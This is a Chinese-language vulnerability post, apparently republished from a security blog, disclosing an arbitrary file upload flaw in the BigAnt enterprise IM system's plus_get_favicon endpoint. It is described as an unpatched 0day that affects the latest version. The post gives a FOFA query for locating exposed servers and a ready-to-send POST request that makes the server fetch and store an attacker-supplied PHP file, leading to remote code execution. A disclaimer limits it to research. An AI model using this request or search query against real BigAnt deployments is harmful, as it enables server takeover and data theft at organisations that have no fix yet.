文章总结： 文档披露了杭州九麒科技大蚂蚁(BigAnt)即时通讯系统plus_get_favicon接口存在任意文件上传漏洞，影响5.5.x及以上版本，包括最新版6.0.1.20250407.1。攻击者可上传恶意PHP文件实现远程代码执行，导致服务器被控制、数据泄露等风险。文档提供了漏洞复现步骤、FOFA资产搜索语法及修复建议，强调仅供安全研究。 综合评分： 78 文章分类： 漏洞POC,漏洞预警,WEB安全,渗透测试,应用安全

【0day】大蚂蚁 (BigAnt) 即时通讯系统 plus_get_favicon 任意文件上传漏洞

0day收割机

2026年2月24日 18:05 山东

漏洞简介

杭州九麒科技大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统，提供多种功能支持。该系统的 plus_get_favicon 接口存在任意文件写入/上传漏洞，攻击者可以通过上传特制的 PHP 文件，执行恶意代码，实现服务器的远程控制，可能导致敏感信息泄露、数据篡改等危害。

影响版本

BigAnt 5.5.x 及以上版本用户

经过测试，最新版本 6.0.1.20250407.1 也受影响

fofa语法

(body=”/Public/static/admin/admin_common.js” && body=”/Public/lang/zh-cn.js.js”) || title=”即时通讯 系统登录” && body=”/Public/static/ukey/Syunew3.js”

漏洞复现

需要注意thinkphp的路由特性，不区分大小写，且还支持如下等方式

/api/dispersedOrg/plus_get_favicon.html

/api/dispersedOrg/plus_get_favicon

在本地http服务的默认首页如 index.html 文件内容包含 <link rel="icon" href="/del.php"> 这种可以通过正则校验以及测试文件del.php的内容。

POST /?m=Admin&c=Plus&a=plus_get_favicon HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

plus_uri=http://127.0.0.1:80&app_id=pc_client

如上图所示，我们成功上传文件到/data/plus_favicon/目录下。

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《【0day】大蚂蚁 (BigAnt) 即时通讯系统 plusgetfavicon 任意文件上传漏洞》